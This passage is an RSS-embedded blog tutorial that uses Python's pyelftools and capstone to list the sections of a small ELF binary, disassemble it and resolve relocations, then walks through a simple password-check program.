<div class="codehilite"><pre><span></span><code><span class="gp">$</span> gcc chall.c -o chall.elf
</code></pre></div>

<h2 id="scripting">Scripting</h2>

<p>For starters, let’s look at the different sections present in the binary.</p>

<div class="codehilite"><pre><span></span><code><span class="c1"># sections.py</span>

<span class="kn">from</span> <span class="nn">elftools.elf.elffile</span> <span class="kn">import</span> <span class="n">ELFFile</span>

<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">&#39;./chall.elf&#39;</span><span class="p">,</span> <span class="s1">&#39;rb&#39;</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
    <span class="n">e</span> <span class="o">=</span> <span class="n">ELFFile</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">section</span> <span class="ow">in</span> <span class="n">e</span><span class="o">.</span><span class="n">iter_sections</span><span class="p">():</span>
        <span class="nb">print</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">section</span><span class="p">[</span><span class="s1">&#39;sh_addr&#39;</span><span class="p">]),</span> <span class="n">section</span><span class="o">.</span><span class="n">name</span><span class="p">)</span>
</code></pre></div>

<p>This script iterates through all the sections and also shows us where it’s loaded. This will be pretty useful later. Running it gives us</p>

<div class="codehilite"><pre><span></span><code><span class="go">› python sections.py</span>
<span class="go">0x238 .interp</span>
<span class="go">0x254 .note.ABI-tag</span>
<span class="go">0x274 .note.gnu.build-id</span>
<span class="go">0x298 .gnu.hash</span>
<span class="go">0x2c0 .dynsym</span>
<span class="go">0x3e0 .dynstr</span>
<span class="go">0x484 .gnu.version</span>
<span class="go">0x4a0 .gnu.version_r</span>
<span class="go">0x4c0 .rela.dyn</span>
<span class="go">0x598 .rela.plt</span>
<span class="go">0x610 .init</span>
<span class="go">0x630 .plt</span>
<span class="go">0x690 .plt.got</span>
<span class="go">0x6a0 .text</span>
<span class="go">0x8f4 .fini</span>
<span class="go">0x900 .rodata</span>
<span class="go">0x924 .eh_frame_hdr</span>
<span class="go">0x960 .eh_frame</span>
<span class="go">0x200d98 .init_array</span>
<span class="go">0x200da0 .fini_array</span>
<span class="go">0x200da8 .dynamic</span>
<span class="go">0x200f98 .got</span>
<span class="go">0x201000 .data</span>
<span class="go">0x201010 .bss</span>
<span class="go">0x0 .comment</span>
<span class="go">0x0 .symtab</span>
<span class="go">0x0 .strtab</span>
<span class="go">0x0 .shstrtab</span>
</code></pre></div>

<p>Most of these aren’t relevant to us, but a few sections here are to be noted. The <code>.text</code> section contains the instructions (opcodes) that we’re after. The <code>.data</code> section should have strings and constants initialized at compile time. Finally, the <code>.plt</code> which is the Procedure Linkage Table and the <code>.got</code>, the Global Offset Table. If you’re unsure about what these mean, read up on the ELF format and its internals.</p>

<p>Since we know that the <code>.text</code> section has the opcodes, let’s disassemble the binary starting at that address.</p>

<div class="codehilite"><pre><span></span><code><span class="c1"># disas1.py</span>

<span class="kn">from</span> <span class="nn">elftools.elf.elffile</span> <span class="kn">import</span> <span class="n">ELFFile</span>
<span class="kn">from</span> <span class="nn">capstone</span> <span class="kn">import</span> <span class="o">*</span>

<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">&#39;./bin.elf&#39;</span><span class="p">,</span> <span class="s1">&#39;rb&#39;</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
    <span class="n">elf</span> <span class="o">=</span> <span class="n">ELFFile</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
    <span class="n">code</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">get_section_by_name</span><span class="p">(</span><span class="s1">&#39;.text&#39;</span><span class="p">)</span>
    <span class="n">ops</span> <span class="o">=</span> <span class="n">code</span><span class="o">.</span><span class="n">data</span><span class="p">()</span>
    <span class="n">addr</span> <span class="o">=</span> <span class="n">code</span><span class="p">[</span><span class="s1">&#39;sh_addr&#39;</span><span class="p">]</span>
    <span class="n">md</span> <span class="o">=</span> <span class="n">Cs</span><span class="p">(</span><span class="n">CS_ARCH_X86</span><span class="p">,</span> <span class="n">CS_MODE_64</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">md</span><span class="o">.</span><span class="n">disasm</span><span class="p">(</span><span class="n">ops</span><span class="p">,</span> <span class="n">addr</span><span class="p">):</span>        
        <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;0x</span><span class="si">{</span><span class="n">i</span><span class="o">.</span><span class="n">address</span><span class="si">:</span><span class="s1">x</span><span class="si">}</span><span class="s1">:</span><span class="se">\t</span><span class="si">{</span><span class="n">i</span><span class="o">.</span><span class="n">mnemonic</span><span class="si">}</span><span class="se">\t</span><span class="si">{</span><span class="n">i</span><span class="o">.</span><span class="n">op_str</span><span class="si">}</span><span class="s1">&#39;</span><span class="p">)</span>
</code></pre></div>

<p>The code is fairly straightforward (I think). We should be seeing this, on running</p>

<div class="codehilite"><pre><span></span><code><span class="go">› python disas1.py | less      </span>
<span class="go">0x6a0: xor ebp, ebp</span>
<span class="go">0x6a2: mov r9, rdx</span>
<span class="go">0x6a5: pop rsi</span>
<span class="go">0x6a6: mov rdx, rsp</span>
<span class="go">0x6a9: and rsp, 0xfffffffffffffff0</span>
<span class="go">0x6ad: push rax</span>
<span class="go">0x6ae: push rsp</span>
<span class="go">0x6af: lea r8, [rip + 0x23a]</span>
<span class="go">0x6b6: lea rcx, [rip + 0x1c3]</span>
<span class="go">0x6bd: lea rdi, [rip + 0xe6]</span>
<span class="go">**0x6c4: call qword ptr [rip + 0x200916]**</span>
<span class="go">0x6ca: hlt</span>
<span class="go">... snip ...</span>
</code></pre></div>

<p>The line in bold is fairly interesting to us. The address at <code>[rip + 0x200916]</code> is equivalent to <code>[0x6ca + 0x200916]</code>, which in turn evaluates to <code>0x200fe0</code>. The first <code>call</code> being made to a function at <code>0x200fe0</code>? What could this function be?</p>

<p>For this, we will have to look at <strong>relocations</strong>. Quoting <a href="http://refspecs.linuxbase.org/elf/gabi4+/ch4.reloc.html">linuxbase.org</a></p>

<blockquote>
  <p>Relocation is the process of connecting symbolic references with symbolic definitions. For example, when a program calls a function, the associated call instruction must transfer control to the proper destination address at execution. Relocatable files must have “relocation entries’’ which are necessary because they contain information that describes how to modify their section contents, thus allowing executable and shared object files to hold the right information for a process’s program image.</p>
</blockquote>

<p>To try and find these relocation entries, we write a third script.</p>

<div class="codehilite"><pre><span></span><code><span class="c1"># relocations.py</span>

<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">from</span> <span class="nn">elftools.elf.elffile</span> <span class="kn">import</span> <span class="n">ELFFile</span>
<span class="kn">from</span> <span class="nn">elftools.elf.relocation</span> <span class="kn">import</span> <span class="n">RelocationSection</span>

<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">&#39;./chall.elf&#39;</span><span class="p">,</span> <span class="s1">&#39;rb&#39;</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
    <span class="n">e</span> <span class="o">=</span> <span class="n">ELFFile</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">section</span> <span class="ow">in</span> <span class="n">e</span><span class="o">.</span><span class="n">iter_sections</span><span class="p">():</span>
        <span class="k">if</span> <span class="nb">isinstance</span><span class="p">(</span><span class="n">section</span><span class="p">,</span> <span class="n">RelocationSection</span><span class="p">):</span>
            <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;</span><span class="si">{</span><span class="n">section</span><span class="o">.</span><span class="n">name</span><span class="si">}</span><span class="s1">:&#39;</span><span class="p">)</span>
            <span class="n">symbol_table</span> <span class="o">=</span> <span class="n">e</span><span class="o">.</span><span class="n">get_section</span><span class="p">(</span><span class="n">section</span><span class="p">[</span><span class="s1">&#39;sh_link&#39;</span><span class="p">])</span>
            <span class="k">for</span> <span class="n">relocation</span> <span class="ow">in</span> <span class="n">section</span><span class="o">.</span><span class="n">iter_relocations</span><span class="p">():</span>
                <span class="n">symbol</span> <span class="o">=</span> <span class="n">symbol_table</span><span class="o">.</span><span class="n">get_symbol</span><span class="p">(</span><span class="n">relocation</span><span class="p">[</span><span class="s1">&#39;r_info_sym&#39;</span><span class="p">])</span>
                <span class="n">addr</span> <span class="o">=</span> <span class="nb">hex</span><span class="p">(</span><span class="n">relocation</span><span class="p">[</span><span class="s1">&#39;r_offset&#39;</span><span class="p">])</span>
                <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;</span><span class="si">{</span><span class="n">symbol</span><span class="o">.</span><span class="n">name</span><span class="si">}</span><span class="s1"> </span><span class="si">{</span><span class="n">addr</span><span class="si">}</span><span class="s1">&#39;</span><span class="p">)</span>
</code></pre></div>

<p>Let’s run through this code real quick. We first loop through the sections, and check if it’s of the type <code>RelocationSection</code>. We then iterate through the relocations from the symbol table for each section. Finally, running this gives us</p>

<div class="codehilite"><pre><span></span><code><span class="go">› python relocations.py</span>
<span class="go">.rela.dyn:</span>
<span class="go"> 0x200d98</span>
<span class="go"> 0x200da0</span>
<span class="go"> 0x201008</span>
<span class="go">_ITM_deregisterTMCloneTable 0x200fd8</span>
<span class="go">**__libc_start_main 0x200fe0**</span>
<span class="go">__gmon_start__ 0x200fe8</span>
<span class="go">_ITM_registerTMCloneTable 0x200ff0</span>
<span class="go">__cxa_finalize 0x200ff8</span>
<span class="go">stdin 0x201010</span>
<span class="go">.rela.plt:</span>
<span class="go">puts 0x200fb0</span>
<span class="go">printf 0x200fb8</span>
<span class="go">fgets 0x200fc0</span>
<span class="go">strcmp 0x200fc8</span>
<span class="go">malloc 0x200fd0</span>
</code></pre></div>

<p>Remember the function call at <code>0x200fe0</code> from earlier? Yep, so that was a call to the well known <code>__libc_start_main</code>. Again, according to <a href="http://refspecs.linuxbase.org/LSB_3.1.0/LSB-generic/LSB-generic/baselib---libc-start-main-.html">linuxbase.org</a></p>

<blockquote>
  <p>The <code>__libc_start_main()</code> function shall perform any necessary initialization of the execution environment, call the <em>main</em> function with appropriate arguments, and handle the return from <code>main()</code>. If the <code>main()</code> function returns, the return value shall be passed to the <code>exit()</code> function.</p>
</blockquote>

<p>And its definition is like so</p>

<div class="codehilite"><pre><span></span><code><span class="kt">int</span> <span class="nf">__libc_start_main</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="p">(</span><span class="n">main</span><span class="p">)</span> <span class="p">(</span><span class="kt">int</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span> <span class="o">*</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span> <span class="o">*</span><span class="p">),</span> 
<span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span> <span class="o">*</span> <span class="n">ubp_av</span><span class="p">,</span> 
<span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">init</span><span class="p">)</span> <span class="p">(</span><span class="kt">void</span><span class="p">),</span> 
<span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">fini</span><span class="p">)</span> <span class="p">(</span><span class="kt">void</span><span class="p">),</span> 
<span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">rtld_fini</span><span class="p">)</span> <span class="p">(</span><span class="kt">void</span><span class="p">),</span> 
<span class="kt">void</span> <span class="p">(</span><span class="o">*</span> <span class="n">stack_end</span><span class="p">));</span>
</code></pre></div>

<p>Looking back at our disassembly</p>

<pre><code>0x6a0: xor ebp, ebp
0x6a2: mov r9, rdx
0x6a5: pop rsi
0x6a6: mov rdx, rsp
0x6a9: and rsp, 0xfffffffffffffff0
0x6ad: push rax
0x6ae: push rsp
0x6af: lea r8, [rip + 0x23a]
0x6b6: lea rcx, [rip + 0x1c3]
**0x6bd: lea rdi, [rip + 0xe6]**
0x6c4: call qword ptr [rip + 0x200916]
0x6ca: hlt
... snip ...
</code></pre>

<p>but this time, at the <code>lea</code> or Load Effective Address instruction, which loads some address <code>[rip + 0xe6]</code> into the <code>rdi</code> register. <code>[rip + 0xe6]</code> evaluates to <code>0x7aa</code> which happens to be the address of our <code>main()</code> function! How do I know that? Because <code>__libc_start_main()</code>, after doing whatever it does, eventually jumps to the function at <code>rdi</code>, which is generally the <code>main()</code> function. It looks something like this</p>

<p><img src="https://cdn-images-1.medium.com/max/800/0*oQA2MwHjhzosF8ZH.png" alt="" /></p>

<p>To see the disassembly of <code>main</code>, seek to <code>0x7aa</code> in the output of the script we’d written earlier (<code>disas1.py</code>).</p>

<p>From what we discovered earlier, each <code>call</code> instruction points to some function which we can see from the relocation entries. So following each <code>call</code> into their relocations gives us this</p>

<pre><code>printf 0x650
fgets  0x660
strcmp 0x670
malloc 0x680
</code></pre>

<p>Putting all this together, things start falling into place. Let me highlight the key sections of the disassembly here. It’s pretty self-explanatory.</p>

<pre><code>0x7b2: mov edi, 0xa  ; 10
0x7b7: call 0x680    ; malloc
</code></pre>

<p>The loop to populate the <code>*pw</code> string</p>

<pre><code>0x7d0:  mov     eax, dword ptr [rbp - 0x14]
0x7d3:  cdqe    
0x7d5:  lea     rdx, [rax - 1]
0x7d9:  mov     rax, qword ptr [rbp - 0x10]
0x7dd:  add     rax, rdx
0x7e0:  movzx   eax, byte ptr [rax]
0x7e3:  lea     ecx, [rax + 1]
0x7e6:  mov     eax, dword ptr [rbp - 0x14]
0x7e9:  movsxd  rdx, eax
0x7ec:  mov     rax, qword ptr [rbp - 0x10]
0x7f0:  add     rax, rdx
0x7f3:  mov     edx, ecx
0x7f5:  mov     byte ptr [rax], dl
0x7f7:  add     dword ptr [rbp - 0x14], 1
0x7fb:  cmp     dword ptr [rbp - 0x14], 8
0x7ff:  jle     0x7d0
</code></pre>

<p>And this looks like our <code>strcmp()</code></p>

<pre><code>0x843:  mov     rdx, qword ptr [rbp - 0x10] ; *in
0x847:  mov     rax, qword ptr [rbp - 8]    ; *pw
0x84b:  mov     rsi, rdx             
0x84e:  mov     rdi, rax
0x851:  call    0x670                       ; strcmp  
0x856:  test    eax, eax                    ; is = 0? 
0x858:  jne     0x868                       ; no? jump to 0x868
0x85a:  lea     rdi, [rip + 0xae]           ; "haha yes!" 
0x861:  call    0x640                       ; puts
0x866:  jmp     0x874
0x868:  lea     rdi, [rip + 0xaa]           ; "nah dude"
0x86f:  call    0x640                       ; puts  
</code></pre>

<p>I’m not sure why it uses <code>puts</code> here? I might be missing something; perhaps <code>printf</code> calls <code>puts</code>. I could be wrong. I also confirmed with radare2 that those locations are actually the strings “haha yes!” and “nah dude”.</p>

<p><strong>Update</strong>: It&#8217;s because of compiler optimization. A <code>printf()</code> (in this case) is seen as a bit overkill, and hence gets simplified to a <code>puts()</code>.</p>

<h2 id="conclusion">Conclusion</h2>

<p>Wew, that took quite some time. But we’re done. If you’re a beginner, you might find this extremely confusing, or probably didn’t even understand what was going on. And that’s okay. Building an intuition for reading and grokking disassembly comes with practice. I’m no good at it either.</p>

<p>All the code used in this post is here: <a href="https://github.com/icyphox/asdf/tree/master/reversing-elf">https://github.com/icyphox/asdf/tree/master/reversing-elf</a></p>

<p>Ciao for now, and I’ll see ya in #2 of this series---PE binaries. Whenever that is.</p>
]]></description><link>https://icyphox.sh/blog/python-for-re-1</link><pubDate>Fri, 08 Feb 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/python-for-re-1</guid></item></channel>
</rss>